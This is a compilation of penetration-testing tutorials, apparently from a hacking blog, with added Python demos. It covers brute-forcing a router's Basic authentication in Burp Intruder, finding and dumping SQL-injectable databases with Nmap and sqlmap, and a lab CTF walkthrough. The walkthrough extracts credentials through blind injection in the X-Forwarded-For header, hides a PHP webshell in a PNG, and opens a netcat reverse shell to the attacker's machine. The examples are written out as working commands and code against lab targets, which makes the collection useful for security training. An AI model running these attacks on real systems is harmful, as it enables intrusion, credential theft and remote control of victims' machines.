Hack the Basic HTTP Authentication using Burpsuite

In the context of an HTTP transaction, basic access authentication is a method for an HTTP user agent to provide a user name and password when making a request.

HTTP Basic authentication (BA) is the simplest technique for enforcing access control on web resources because it requires no cookies, session identifiers, or login pages; instead it uses standard fields in the HTTP header, so no handshake is needed.
The BA mechanism provides no confidentiality protection for the transmitted credentials. They are merely Base64-encoded in transit, not encrypted or hashed in any way, so anyone who can read the request can read the password. HTTPS is therefore typically used in conjunction with Basic Authentication. Note also that Basic authentication has no lockout of its own: unless the server rate-limits failed attempts, the credentials can be guessed from a dictionary, which is exactly what this article does.
For more details, see the Wikipedia article on basic access authentication.

Attacker: Kali Linux
Target: TP link Router

In this article I will attack a router and try to bypass its authentication. To reach the authentication prompt, browse to the router IP 192.168.1.1. The browser now asks for user credentials before it will show the router's control panel.



Since I do not know the user's credentials, I typed random values into the prompt so that the request could be captured in Burp Suite. Before sending it, start Burp Suite, open the Proxy tab, set Intercept is on, and then submit the authentication prompt by clicking OK.


The request is captured by Burp Suite, as shown in the image below. The highlighted value in the last line is the Authorization header: it tells us that the router uses Basic authentication and, as described in the theory above, the credentials in it are only Base64-encoded. Decoding that value (for example in Burp's Decoder tab) gives back the user:password string that was typed.


Now we want to generate the encoded value for the authentication header inside Burp Suite. Right-click the request (or open the Action menu) and choose Send to Intruder to set up the brute-force attack.


Open the Intruder tab and click Positions. Here you configure where the payload will be inserted into the request; the attack type determines how payloads are assigned to the positions (Sniper is sufficient for a single position). Select the Base64-encoded value after Basic in the Authorization header and click the Add button to mark it as the payload position.


The Base64-encoded value of the Authorization header is the username and password joined by a colon (user:password). The plan is to generate the same encoding from a dictionary of candidate credentials, so I made a text file on the desktop in which each line contains a user:password pair. This dictionary will be used as the Intruder payload for the brute-force attack.


To use the dictionary as the payload, click the Payloads tab under Intruder and load the user:password file from Payload Options (Simple list). The request must carry the payload in Base64, so the payload has to be encoded before it is sent: click the Add button under Payload Processing, and in the dialog that opens choose the Encode rule, then select Base64-encode from the drop-down list.
One check before starting: under Payload Encoding, Burp URL-encodes a default set of characters that includes =, which would corrupt the Base64 padding; untick that option (or remove = from the list) so the encoded value is sent unchanged.


Click Start attack. Intruder now sends one request per dictionary line and the server either rejects it with 401 or accepts it. In the screenshot you can see that the status code and response length of the highlighted row differ from all the others; the identical 401 responses are the failed guesses, and the one different response, request number 6, is the match. Look up line 6 of the dictionary: in mine it was admin:ps******** (password masked), the credentials that authenticate successfully.


Now open the router IP again and enter the username and password found above. As the screenshot shows, I have logged in to the router's control panel.
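
To make the mechanism concrete, here is an added Python example (not code from the original article and not Burp's) that does by hand what the steps above do in Intruder: it encodes and decodes the Authorization header, then replays a user:password dictionary against a constructed stand-in for the router's login. The router, the dictionary and the matching credential admin:ps123456 are all constructed for the demo (the article's real password is masked). It differs from Burp in one detail: Intruder shows the hit as a change in status code and response length, while this code simply stops at the first status other than 401.

```python
import base64
import hmac
from typing import Callable, Iterable, Optional, Tuple


def encode_basic(username: str, password: str) -> str:
    """Build the Authorization header value the browser sends (RFC 7617)."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def decode_basic(header_value: str) -> Tuple[str, str]:
    """Recover the credentials from a captured header. Base64 is an encoding,
    not encryption, so no key is needed; this is what Burp's Decoder does."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    raw = base64.b64decode(token).decode("utf-8")
    # Split on the FIRST colon only: user names may not contain ':', passwords may.
    user, _, pwd = raw.partition(":")
    return user, pwd


def make_mock_router(valid_user: str, valid_pass: str) -> Callable[[str], int]:
    """Constructed stand-in for the router's admin page. Takes an Authorization
    header value and returns an HTTP status: 401 on a bad guess, 200 on success."""
    expected = encode_basic(valid_user, valid_pass)

    def handle(auth_header: str) -> int:
        # constant-time compare, as a decent server would do
        return 200 if hmac.compare_digest(auth_header, expected) else 401

    return handle


def brute_force(wordlist: Iterable[str], send: Callable[[str], int]) -> Optional[Tuple[int, str, str]]:
    """The Intruder attack by hand: each dictionary line is 'user:pass', it is
    Base64-encoded into the header and sent, and the first response whose
    status differs from the 401 baseline is the hit.
    Returns (1-based request number, username, password), or None."""
    for number, line in enumerate(wordlist, start=1):
        line = line.rstrip("\n")
        if ":" not in line:
            continue  # blank or malformed dictionary entry
        user, _, pwd = line.partition(":")
        if send(encode_basic(user, pwd)) != 401:
            return number, user, pwd
    return None


# Constructed dictionary, one user:pass per line as in the article's text file.
DICTIONARY = [
    "admin:admin",
    "admin:password",
    "root:toor",
    "admin:1234",
    "user:user",
    "admin:ps123456",
]

if __name__ == "__main__":
    # Header value as it appears in an intercepted request (constructed)
    print(decode_basic("Basic YWRtaW46YWRtaW4="))           # ('admin', 'admin')
    router = make_mock_router("admin", "ps123456")           # constructed router secret
    print(brute_force(DICTIONARY, router))                   # (6, 'admin', 'ps123456')
```

The same loop run against a real device is noisy and slow; the point of the example is that nothing about the header is secret once it is captured, and that the only thing standing between a dictionary and the control panel is whether the device rate-limits or locks out failed attempts.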

Exploiting Sql Injection with Nmap and Sqlmap

This article shows how to scan a target for SQL injection using Nmap and, if Nmap reports a likely injection point, exploit it with sqlmap. Follow the tutorial for the details.

First, type www.vulnweb.com in the URL bar to open Acunetix's vulnerable web applications page, then click the link for Acuart as shown in the screenshot.


The required web page opens; testphp.vulnweb.com is our target host, and we now scan it with Nmap to identify possible SQL injection points.


Nmap ships an NSE script, http-sql-injection, for this job. According to its documentation, it spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack, and it also extracts forms from the pages it finds and tries to identify vulnerable fields.

The script spiders the server looking for URLs that carry query strings, then appends crafted SQL fragments to each candidate URL in order to provoke errors. The responses are analysed for database error messages to decide whether the URL is vulnerable. This is the most basic (error-based) form of SQL injection detection; anything more complicated, such as blind injection, is better suited to a standalone tool like sqlmap.

Note that Nmap may not know the target web server's true hostname, which can prevent access to virtually hosted sites; pass the hostname rather than an IP address where possible.
Now type the following command to scan the target for SQL injection possibilities:

nmap -sV --script=http-sql-injection testphp.vulnweb.com -p 80

From the screenshot you can see that it has listed the query URLs it believes are injectable. Now let's open one of these in the browser.

Note: remove the http:// prefix from the reported URLs before pasting them into the browser.
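
The following Python is an added example (not the NSE script itself and not code from the article) of the error-based check the script performs: append a quote-style probe to each query parameter, fetch the page, and grep the body for database error messages. The fetch function is a constructed stand-in for the target, with one endpoint that concatenates the cat parameter into SQL and one that binds it; the host name in the URLs is only a label and nothing is sent over the network.

```python
import re
import sqlite3
from typing import Callable, List, Optional, Tuple
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Error signatures that show an unescaped probe reached the database engine.
# A short list for the demo; the NSE script's error matching is broader.
DB_ERROR_PATTERNS = {
    "MySQL": re.compile(r"You have an error in your SQL syntax|mysql_fetch_|supplied argument is not a valid MySQL", re.I),
    "MSSQL": re.compile(r"Unclosed quotation mark|Microsoft OLE DB Provider for SQL Server", re.I),
    "PostgreSQL": re.compile(r"pg_query\(\)|PostgreSQL.*ERROR", re.I),
    "Oracle": re.compile(r"ORA-\d{5}", re.I),
    "SQLite": re.compile(r"unrecognized token|SQLITE_ERROR|near \".*\": syntax error", re.I),
}

# Quote-style probes: breaking the string or number literal is the most basic test.
PROBES = ["'", '"', "')"]


def classify_error(body: str) -> Optional[str]:
    """Name of the database engine whose error text appears in the page, or None."""
    for engine, pattern in DB_ERROR_PATTERNS.items():
        if pattern.search(body):
            return engine
    return None


def find_injectable_params(url: str, fetch: Callable[[str], str]) -> List[Tuple[str, str]]:
    """For each query parameter, append each probe in turn, fetch the page and
    record (parameter, engine) as soon as a DB error signature shows up."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    hits: List[Tuple[str, str]] = []
    for index, (name, value) in enumerate(params):
        for probe in PROBES:
            mutated = list(params)
            mutated[index] = (name, value + probe)
            probe_url = urlunsplit(parts._replace(query=urlencode(mutated)))
            engine = classify_error(fetch(probe_url))
            if engine:
                hits.append((name, engine))
                break  # one confirmed probe per parameter is enough
    return hits


def make_mock_site() -> Callable[[str], str]:
    """Constructed stand-in for the target. listproducts.php concatenates `cat`
    straight into SQL (vulnerable); search.php binds `q` (safe). Both leak the
    driver's error text into the page when a query fails, which is what
    error-based detection relies on."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products(id INTEGER, cat INTEGER, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)", [(1, 1, "poster"), (2, 2, "book")])

    def fetch(url: str) -> str:
        parts = urlsplit(url)
        q = dict(parse_qsl(parts.query, keep_blank_values=True))
        try:
            if parts.path.endswith("listproducts.php"):
                sql = f"SELECT name FROM products WHERE cat = {q.get('cat', '')}"  # vulnerable
                rows = db.execute(sql).fetchall()
            else:
                rows = db.execute("SELECT name FROM products WHERE name LIKE ?",
                                  (f"%{q.get('q', '')}%",)).fetchall()
        except sqlite3.Error as exc:
            return f"<b>Warning</b>: database error: {exc}"
        return "<ul>" + "".join(f"<li>{r[0]}</li>" for r in rows) + "</ul>"

    return fetch


SITE = make_mock_site()

if __name__ == "__main__":
    # Host names are labels only; nothing leaves the process.
    print(find_injectable_params("http://testphp.vulnweb.com/listproducts.php?cat=1", SITE))  # [('cat', 'SQLite')]
    print(find_injectable_params("http://testphp.vulnweb.com/search.php?q=poster", SITE))     # []
```

Two limits of this check are worth keeping in mind when reading Nmap's output: an application that catches exceptions and returns a generic page is still injectable but produces no hit (a false negative, the blind case), and an application that echoes the word "error" for unrelated reasons can trigger a loose pattern (a false positive). That is why the article confirms Nmap's finding with sqlmap before trusting it.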


The page shows a warning about an error in the database query, which is exactly the error-based signal the script looks for. Now let's feed the URL that Nmap reported into sqlmap to confirm whether Nmap's result really is a SQL injection vulnerability.


Open the terminal in Kali Linux and type the sqlmap command shown in the screenshot.



sqlmap confirms the injection reported by Nmap and enumerates the databases; you can read the database name acuart in the screenshot.


Now try to extract all the data reachable through this URL by typing the command shown in the screenshot.



This dumps all available information inside the database. Now try it yourself.

Easy way to Hack Database using Wizard switch in Sqlmap

sqlmap provides a wizard option for beginners that saves a lot of time. Start Kali Linux, open the terminal and type the following command to use the sqlmap wizard interface:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard

Type 1 (normal) to select the injection difficulty, then type 1 again for basic enumeration.


It automatically dumps basic details of the back-end server. Here you can see from the screenshot that the web server is nginx, the web application technology is PHP 5.3.10, the operating system is Linux (Ubuntu), and more.


Now raise the level of the test. Type the same command again:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard

Type 2 (medium) to select the injection difficulty, then type 2 again for intermediate enumeration.


Wonderful! We have the database name and all table names with their columns.

Now raise the level once more. Repeat the same command:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard

Type 3 (hard) to select the injection difficulty, then type 3 again for all enumeration.


Awesome: within three steps we have the entire content of the acuart database. You can see the result in the screenshot.


Here we have all tables with their field details and column details.

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Hello friends! Today we are going to solve another CTF challenge, "From SQL injection to Shell II"; you can read part 1 here. This VM was developed by Pentester Lab. You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/
Install the ISO image in VMware and start it. The task given in this lab is to gain access to the administration console and upload a PHP webshell.
Level: Intermediate
Penetrating Methodologies
§  Network Scanning (Nmap)
§  Blind time-based SQL injection
§  Exploiting SQL Injection (SQLMAP)
§  Hiding web shell inside Image (exiftool)
§  Uploading Web shell
§  Spawning Shell (Netcat)

Walkthrough

The target's IP address is 192.168.1.102; first use Nmap to find the open ports:
nmap -A 192.168.1.102
Since the HTTP port is open, we open the target IP in the web browser and are welcomed by the My Awesome Photoblog page. It contains the links home, test, ruxcon, 2010, all pictures and admin. Click on test.
The resulting URL, http://192.168.1.102/cat.php?id=1, runs an SQL query for ID 1. Let's test whether it is vulnerable to SQL injection by adding an apostrophe (') at the end of the URL:
Unfortunately this page is not vulnerable to error-based SQL injection. As the author already mentions, in this lab you will learn "Blind SQL injection exploitation using time-based exploitation" and "Gaining code execution using a PHP webshell".
I then scanned the target with Acunetix, which rated the threat level as high for blind SQL injection.
Hence it is clear that the target can be exploited through SQL injection.
After a little more research I found the way to exploit it using sqlmap: the injection point is not the id parameter but the X-Forwarded-For header, whose value the application uses in a query without sanitising it. In sqlmap the * inside a header value marks the exact position to inject, so the header is passed with --headers:
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers="X-Forwarded-For: *" --dbs --batch
If you remember, the title of the web page was "My Awesome Photoblog", and sure enough the database sqlmap lists is named photoblog.
Now let's fetch all the data in the photoblog database with the following command:
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers="X-Forwarded-For: *" -D photoblog --dump-all --batch
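
As an added example (not the lab's code and not sqlmap's), the Python below shows what sqlmap is doing behind that --headers option: an in-memory SQLite application that concatenates X-Forwarded-For into a query, plus a blind extractor that recovers the admin password one character at a time by bisection. Both a boolean oracle (the page text differs) and a time-based oracle (only the response time differs, as in this lab) are shown. SQLite has no SLEEP(), so a Python sleep function is registered as a stand-in for MySQL's SLEEP(); the tables, the visitor rows and the stored password P4ssw0rd are constructed so that the demo reproduces the lab's result.

```python
import sqlite3
import time
from typing import Callable, Dict, Tuple

DELAY = 0.05  # seconds; against a real target use 5s or more to beat network jitter


def make_photoblog() -> Callable[[Dict[str, str]], Tuple[str, float]]:
    """Constructed stand-in for the lab's cat.php: the client IP taken from
    X-Forwarded-For is concatenated into a lookup query, which is the injection
    point sqlmap was given with --headers="X-Forwarded-For: *". Returns
    (body, elapsed_seconds) so both kinds of oracle can use it."""
    db = sqlite3.connect(":memory:")
    db.create_function("sleep", 1, time.sleep)  # stand-in for MySQL's SLEEP(); not in stock SQLite
    db.executescript("""
        CREATE TABLE users(login TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'P4ssw0rd');
        CREATE TABLE visitors(ip TEXT);
        INSERT INTO visitors VALUES ('10.0.0.5'), ('10.0.0.9');
    """)

    def request(headers: Dict[str, str]) -> Tuple[str, float]:
        xff = headers.get("X-Forwarded-For", "127.0.0.1")
        sql = f"SELECT count(*) FROM visitors WHERE ip = '{xff}'"  # vulnerable: no binding
        start = time.monotonic()
        seen = db.execute(sql).fetchone()[0]
        body = "Welcome back!" if seen else "First visit"
        return body, time.monotonic() - start

    return request


def boolean_oracle(request, cond: str) -> bool:
    # Close the string, OR in our condition, and re-balance the trailing quote:
    #   ... WHERE ip = '0.0.0.0' OR (<cond>) AND '1'='1'
    body, _ = request({"X-Forwarded-For": f"0.0.0.0' OR ({cond}) AND '1'='1"})
    return "Welcome back" in body


def time_oracle(request, cond: str) -> bool:
    # No visible difference in the page at all; only the response time leaks the answer
    payload = f"0.0.0.0' OR (CASE WHEN ({cond}) THEN sleep({DELAY}) ELSE 0 END) AND '1'='1"
    _, elapsed = request({"X-Forwarded-For": payload})
    return elapsed >= DELAY


def extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    """Bisection per character, the strategy sqlmap uses for blind injection:
    about 7 requests per character instead of one per candidate value."""
    lo, hi = 0, max_len                       # first recover the length
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length({subquery}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126                      # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({subquery}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


ADMIN_PASSWORD = "(SELECT password FROM users WHERE login = 'admin')"


def dump_admin_password(time_based: bool = False) -> str:
    request = make_photoblog()
    oracle = (lambda c: time_oracle(request, c)) if time_based else (lambda c: boolean_oracle(request, c))
    return extract(oracle, ADMIN_PASSWORD)


if __name__ == "__main__":
    print(dump_admin_password())                  # boolean-based, fast
    print(dump_admin_password(time_based=True))   # time-based, every true branch costs DELAY
```

sqlmap performs the same bisection over the network (--technique=T with --time-sec=N selects the time-based path). The cost of a time-based oracle is visible in the example: every true branch costs at least one full delay, so dumping a whole database takes a long time and the delay must be large enough that network jitter cannot flip an answer.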
Now try the dumped credentials on the administration console: open the target IP 192.168.1.102 in the browser again, click the login tab, and log in as admin with the password P4ssw0rd.
Congrats! The first task is completed.
The last task is to upload a PHP webshell. In the administration console you will see a link, Add a new picture, for uploading an image to the web server. Click on it.
I tried to upload a malicious PHP file with the .php extension, with a double extension (.php.jpg), and with mixed-case extensions such as .PHP and .pHP, but every attempt was rejected and the following page was shown instead.
So I used exiftool to embed the malicious PHP inside a genuine image, which yields remote code execution once the server can be made to interpret it. I downloaded an image, 1.png, and copied simple-backdoor.php from /usr/share/webshells/php/ to the desktop to bind it into the image.
Now run exiftool to hide the PHP code inside the PNG's comment field (note there must be no space after <=, which tells exiftool to read the tag value from the named file):
cd Desktop
exiftool "-comment<=simple-backdoor.php" 1.png
exiftool 1.png
As you can observe, the malicious code is now stored inside the image, which remains a valid PNG and therefore passes the extension check.
Now browse to 1.png and add it as a new picture; this image is our PHP webshell.
The file uploads successfully. A new row appears for the picture containing our PHP backdoor; click on it.
The image with the hidden backdoor is on the server; now we need to execute it.
Inspecting the page source reveals the path of the uploaded image. Let's open it.

We know the image carries a webshell that allows remote code execution, but requested as is it is only served as a picture. The trick is to append /cmd.php to the image path: the server hands any path that contains a .php component to the PHP interpreter (a path-info misconfiguration), so the PHP embedded in the image's comment runs. Using the enumerated path, I first try to read /etc/passwd:

http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/passwd
As you can observe, we have successfully pulled the passwd file, so the next step is to spawn a shell on the victim through it.
Start a netcat listener on the attacking machine and then make the webshell connect back to it; the port in the listener and in the cmd payload must match, and -e requires a netcat build that supports it (nc.traditional on Kali). Here the attacker is 192.168.1.105:
nc -lvp 1234
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc 192.168.1.105 1234 -e /bin/sh
Superb! We completed the last challenge too, and here we have a reverse shell on the victim.


SQL Injection Exploitation in Multiple Targets using Sqlmap

In this article we are going to perform a SQL injection attack on multiple targets at once with sqlmap.

In the tutorial I used two buggy web applications: DVWA and Acuart (testphp.vulnweb.com).


Start DVWA, select the SQL Injection vulnerability, type a user ID, click Submit, and copy the resulting URL.


Start Kali Linux and create a text file, sql.txt, on the desktop; it will hold one target URL per line. Paste the copied URL into it. From the screenshot you can see that I pasted the URL above into this file and saved it as sql.txt.

Repeat the same process with a different web application. Open vulnweb.com and click the URL given for Acuart.


Now click on Browse categories, then click on Posters.


Now let's verify whether the cat ID is vulnerable to SQL injection or not: add an apostrophe (') at the end of the URL as shown in the screenshot. You can see that I received a database error message, which means the ID is injectable. Copy its URL.


Paste the copied URL into sql.txt and save it again. The file now holds two URLs, one vulnerable parameter from each web application.


Open the terminal and type the following command to test all the targets listed in the file with sqlmap (-m reads targets from a file, --batch accepts the default answer to every prompt):
sqlmap -m /root/Desktop/sql.txt --dbs --batch


So here you can see that I have obtained the database names for multiple targets. First, dvwa appears among the database names.


Later, another database name, acuart, appears for the second target. Now try it yourself with more targets.